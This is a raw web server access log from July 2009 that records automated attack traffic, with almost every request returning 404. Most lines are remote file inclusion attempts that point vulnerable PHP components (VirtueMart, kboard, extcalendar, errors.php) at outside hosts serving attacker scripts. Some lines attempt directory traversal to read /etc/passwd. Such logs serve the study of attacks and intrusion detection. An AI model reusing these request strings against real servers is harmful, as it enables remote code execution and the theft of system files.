83.98.209.71 - - [02/Jul/2009:01:40:05 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 288
122.153.28.140 - - [02/Jul/2009:01:43:01 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
122.153.28.140 - - [02/Jul/2009:01:43:09 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
124.0.139.129 - - [02/Jul/2009:01:48:50 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
124.0.139.129 - - [02/Jul/2009:01:48:54 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
124.0.139.129 - - [02/Jul/2009:01:48:55 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
124.0.139.129 - - [02/Jul/2009:01:49:00 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
124.0.139.129 - - [02/Jul/2009:01:49:00 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
124.0.139.129 - - [02/Jul/2009:01:49:02 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
217.125.38.117 - - [02/Jul/2009:01:49:28 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 288
217.125.38.117 - - [02/Jul/2009:01:49:29 +0000] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 293
217.125.38.117 - - [02/Jul/2009:01:49:29 +0000] "GET /logs/access_log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 304
87.118.116.72 - - [02/Jul/2009:01:53:18 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 337
87.118.116.72 - - [02/Jul/2009:01:53:18 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 321
87.118.116.72 - - [02/Jul/2009:01:53:18 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 326
124.0.139.129 - - [02/Jul/2009:01:53:26 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
124.0.139.129 - - [02/Jul/2009:01:53:44 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
195.34.78.110 - - [02/Jul/2009:01:54:02 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 288
195.34.78.110 - - [02/Jul/2009:01:54:02 +0000] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 293
195.34.78.110 - - [02/Jul/2009:01:54:02 +0000] "GET /logs/access_log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 306
195.34.78.110 - - [02/Jul/2009:01:54:12 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 288
195.34.78.110 - - [02/Jul/2009:01:54:13 +0000] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 293
195.34.78.110 - - [02/Jul/2009:01:54:13 +0000] "GET /logs/access_log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 306
195.34.78.110 - - [02/Jul/2009:02:01:08 +0000] "GET /logs/access_log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 304
195.34.78.110 - - [02/Jul/2009:02:01:08 +0000] "GET /logs/access_log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 304
72.14.199.85 - - [02/Jul/2009:02:09:10 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
82.194.87.219 - - [02/Jul/2009:02:13:09 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 345
82.194.87.219 - - [02/Jul/2009:02:13:37 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 345
83.98.209.71 - - [02/Jul/2009:02:16:58 +0000] "GET /////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 200 125
83.98.209.71 - - [02/Jul/2009:02:16:58 +0000] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 200 1887
83.98.209.71 - - [02/Jul/2009:02:16:58 +0000] "GET /logs/access_log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 299
83.98.209.71 - - [02/Jul/2009:02:17:27 +0000] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 200 1887
83.98.209.71 - - [02/Jul/2009:02:17:27 +0000] "GET /////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 200 125
83.98.209.71 - - [02/Jul/2009:02:17:27 +0000] "GET /logs/access_log/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 297
83.98.209.71 - - [02/Jul/2009:02:17:52 +0000] "GET /////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 200 125
83.98.209.71 - - [02/Jul/2009:02:17:52 +0000] "GET /logs/access_log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 299
83.98.209.71 - - [02/Jul/2009:02:17:52 +0000] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 200 1887
82.194.87.219 - - [02/Jul/2009:02:18:20 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 345
82.194.87.219 - - [02/Jul/2009:02:19:00 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 345
82.194.87.219 - - [02/Jul/2009:02:19:35 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 345
82.194.87.219 - - [02/Jul/2009:02:20:17 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 345
83.98.209.71 - - [02/Jul/2009:02:25:23 +0000] "GET /logs/access_log/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 297
83.98.209.71 - - [02/Jul/2009:02:25:29 +0000] "GET /logs/access_log/////?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 297
208.80.195.33 - - [02/Jul/2009:02:36:06 +0000] "GET / HTTP/1.0" 200 125
195.30.249.94 - - [02/Jul/2009:03:01:22 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bosan.com.tw/cache/baner.txt?? HTTP/1.1" 404 333
195.30.249.94 - - [02/Jul/2009:03:01:22 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bosan.com.tw/cache/baner.txt?? HTTP/1.1" 404 328
195.30.249.94 - - [02/Jul/2009:03:01:22 +0000] "GET /logs/access_log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bosan.com.tw/cache/baner.txt?? HTTP/1.1" 404 346
85.13.136.148 - - [02/Jul/2009:03:02:25 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 328
85.13.136.148 - - [02/Jul/2009:03:02:25 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 333
85.13.136.148 - - [02/Jul/2009:03:02:25 +0000] "GET /logs/access_log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 346
212.91.227.172 - - [02/Jul/2009:03:05:57 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 328
212.91.227.172 - - [02/Jul/2009:03:05:57 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 333
212.91.227.172 - - [02/Jul/2009:03:05:57 +0000] "GET /logs/access_log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 346
212.91.227.172 - - [02/Jul/2009:03:05:57 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 328
212.91.227.172 - - [02/Jul/2009:03:05:57 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 333
212.91.227.172 - - [02/Jul/2009:03:05:57 +0000] "GET /logs/access_log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 346
195.30.249.94 - - [02/Jul/2009:03:08:39 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bosan.com.tw/cache/baner.txt?? HTTP/1.1" 404 344
72.14.199.85 - - [02/Jul/2009:03:09:22 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
85.13.136.148 - - [02/Jul/2009:03:12:34 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 344
212.91.227.172 - - [02/Jul/2009:03:15:56 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 344
77.221.130.22 - - [02/Jul/2009:03:16:32 +0000] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 328
77.221.130.22 - - [02/Jul/2009:03:16:32 +0000] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 333
77.221.130.22 - - [02/Jul/2009:03:16:32 +0000] "GET /logs/access_log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 344
77.221.130.22 - - [02/Jul/2009:03:16:34 +0000] "GET /logs/access_log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 344
77.221.130.22 - - [02/Jul/2009:03:16:34 +0000] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 328
77.221.130.22 - - [02/Jul/2009:03:16:34 +0000] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 333
212.91.227.172 - - [02/Jul/2009:03:16:41 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 344
77.221.130.22 - - [02/Jul/2009:03:18:28 +0000] "GET /logs/access_log%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 345
77.221.130.22 - - [02/Jul/2009:03:18:32 +0000] "GET /logs/access_log%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 345
60.43.229.5 - - [02/Jul/2009:03:26:51 +0000] "GET /logs/access_log/errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 291
60.43.229.5 - - [02/Jul/2009:03:26:51 +0000] "GET /logs/errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 280
60.43.229.5 - - [02/Jul/2009:03:26:51 +0000] "GET /errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275
124.0.139.129 - - [02/Jul/2009:03:29:25 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
124.0.139.129 - - [02/Jul/2009:03:29:25 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
124.0.139.129 - - [02/Jul/2009:03:29:30 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
124.0.139.129 - - [02/Jul/2009:03:31:35 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
124.0.139.129 - - [02/Jul/2009:03:31:40 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
124.0.139.129 - - [02/Jul/2009:03:31:40 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
60.43.229.5 - - [02/Jul/2009:03:34:38 +0000] "GET /logs/access_log%20%20/errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 293
195.34.78.110 - - [02/Jul/2009:03:41:13 +0000] "GET /logs/access_log%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 357
195.34.78.110 - - [02/Jul/2009:03:41:13 +0000] "GET /logs/access_log%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 357
124.0.139.129 - - [02/Jul/2009:03:45:47 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
124.0.139.129 - - [02/Jul/2009:03:45:55 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
82.194.87.219 - - [02/Jul/2009:03:46:09 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 345
82.194.87.219 - - [02/Jul/2009:03:51:15 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 345
124.0.139.129 - - [02/Jul/2009:03:52:36 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
124.0.139.129 - - [02/Jul/2009:03:52:36 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
124.0.139.129 - - [02/Jul/2009:03:52:36 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
124.0.139.129 - - [02/Jul/2009:03:53:11 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
124.0.139.129 - - [02/Jul/2009:03:53:12 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
124.0.139.129 - - [02/Jul/2009:03:53:16 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
122.153.28.140 - - [02/Jul/2009:03:56:43 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
122.153.28.140 - - [02/Jul/2009:03:56:43 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
122.153.28.140 - - [02/Jul/2009:03:56:43 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
122.153.28.140 - - [02/Jul/2009:03:56:44 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
122.153.28.140 - - [02/Jul/2009:03:56:44 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
122.153.28.140 - - [02/Jul/2009:03:56:44 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
124.0.139.129 - - [02/Jul/2009:03:57:19 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
82.194.87.219 - - [02/Jul/2009:03:57:39 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 345
209.51.141.77 - - [02/Jul/2009:03:58:42 +0000] "GET /errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 287
209.51.141.77 - - [02/Jul/2009:03:58:42 +0000] "GET /logs/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 292
209.51.141.77 - - [02/Jul/2009:03:58:43 +0000] "GET /logs/access_log/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 303
209.51.141.77 - - [02/Jul/2009:03:58:47 +0000] "GET /logs/access_log/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 303
209.51.141.77 - - [02/Jul/2009:03:58:47 +0000] "GET /errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 287
209.51.141.77 - - [02/Jul/2009:03:58:47 +0000] "GET /logs/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 292
195.34.78.110 - - [02/Jul/2009:03:59:28 +0000] "GET /logs/errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 292
195.34.78.110 - - [02/Jul/2009:03:59:28 +0000] "GET /logs/access_log/errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 303
195.34.78.110 - - [02/Jul/2009:03:59:28 +0000] "GET /errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 287
195.34.78.110 - - [02/Jul/2009:03:59:30 +0000] "GET /errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 287
195.34.78.110 - - [02/Jul/2009:03:59:30 +0000] "GET /logs/errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 292
195.34.78.110 - - [02/Jul/2009:03:59:30 +0000] "GET /logs/access_log/errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 303
209.51.141.77 - - [02/Jul/2009:04:00:25 +0000] "GET /logs/access_log%20%20/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 305
209.51.141.77 - - [02/Jul/2009:04:00:51 +0000] "GET /logs/access_log%20%20/errors.php?error=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 305
82.194.87.219 - - [02/Jul/2009:04:01:57 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 345
195.34.78.110 - - [02/Jul/2009:04:03:17 +0000] "GET /logs/access_log%20%20/errors.php?error=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 305
124.0.139.129 - - [02/Jul/2009:04:03:18 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
